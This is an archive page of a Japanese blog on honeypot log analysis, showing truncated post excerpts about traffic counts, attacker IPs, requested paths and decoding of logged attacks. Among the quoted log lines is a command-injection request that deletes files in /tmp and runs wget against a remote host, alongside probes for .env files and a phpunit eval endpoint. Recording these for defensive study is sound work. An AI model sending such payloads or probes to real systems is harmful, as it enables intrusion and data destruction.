2022-02-01から1ヶ月間の記事一覧
ハニーポットを構築してからほとんどがGETリクエストでとりあえずつつく攻撃でしたので200レスポンスかログインアクセスをしてくるレスポンスとして401がほとんどでした。 本日のログに初めて201レスポンスを返す攻撃が来ました。 HTTPリクエストに関しては…
2月15日、16日に1000を超えるアクセスがありました。 ipアドレスを日別で集計すると犯人が見つかりました。下記が集計結果です。 2001 2022-02-16 201.218.229.228 2001 2022-02-15 201.218.229.228 1650 2022-02-16 210.210.26.37 541 2022-02-09 60.2…
下記のログを分析していくよ! 6350 /manager/html 462 / 157 /xmlrpc.php 85 /.env 42 /autodiscover 27 91.218.66.202:4444 27 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 19 /favicon.ico 17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.syt…
ハニーポットのアクセスログを見ていきます。 ログの集計期間は2/3〜2/16です。 アクセスログの中から10アクセス以上のURLを抽出しました。 6350 /manager/html 462 / 157 /xmlrpc.php 85 /.env 42 /autodiscover 27 91.218.66.202:4444 27 /vendor/phpunit/…
ハニーポットを植えてから10日ほど経ちました。アクセス数を見ます。2月9日のアクセスが急激に伸びてます。基本的には土日のアクセスが多そうですね。急激なアクセスの後はアクセス数70程度で推移しています。この日に何が起きていたのでしょう?? 次…
今日来たアクセスを分析していきます。 ログの中から下記アクセスを見ていきます。 167.94.146.59 XXXXXXXXXXX "GET / HTTP/1.1" 200 False ※XXXXはマスクしてあります。 167.94.146.59のGETアクセスをしてきています。 base64でエンコードされている部分を…
今日はアクセスログの中で正常応答しなかったログを抽出して、1つのログをピックアップして分析します。 アクセスログの中でHTTPのレスポンスコード200以外の応答をgrepで抽出します。[1] コマンドは以下 cat access_log | grep -v 200 結果例 たくさんの正…
アクセスログはbase64でエンコードされている部分がWOWHoneypotのアクセスログにあります。この文字列をデコードしてあげると、どんなコマンドを仕掛けているかわかります。1日数十から多い時は数百のアクセスがくるので全てにデコードして分析は非現実的で…
ハニーポットを再構築して3日ほど経ちました。アクセスが早速きているのでログを見てみます。まだ、集計用のスクリプトなど作っていないので今日は不審なHTMLタグ挿入があるか抽出してみます。 ログ抽出用のコマンドはこちら[1] grep -E "<[^>]+>[^<]+<[^>]…
ハニーポットを作成しましたが設定などメール送信したり、分析用コードを作成のためにpythonライブラリを色々入れたりしてました。これだと再構築したりするときに同じ手順を踏んで構築ができないので作り直して作成方法を記録することにしました。 環境 さ…
